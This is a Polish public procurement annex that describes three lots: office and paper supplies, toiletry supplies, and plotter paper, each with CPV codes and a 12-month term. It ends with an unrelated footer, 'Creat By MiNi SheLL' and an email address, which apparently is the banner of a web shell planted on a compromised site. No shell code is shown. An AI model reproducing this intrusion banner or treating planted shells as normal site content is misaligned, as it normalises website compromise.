<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część   I  -  sukcesywna dostawa materiałów biurowych i papierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów biurowych i papierniczych zgodnie z pkt. III Opisu przedmiotu zamówienia SIWZ - I Część - załącznik A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-4, 30.19.76.44-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część   II -  sukcesywna dostawa materiałów toaletowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest sukcesywna dostawa materiałów toaletowych zgodnie z pkt. III Opisu przedmiotu zamówienia  SIWZ - II Część - Załącznik B.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.10.00-2, 33.76.30.00-6, 33.71.19.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część  III -  sukcesywna dostawa materiałów papierniczych do ploterów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest sukcesywna dostawa materiałów papierniczych do plotarów zgodnie z pkt. III Opisu przedmiotu zamówienia SIWZ - III Cześć - Załącznik C.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-4, 30.19.76.44-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com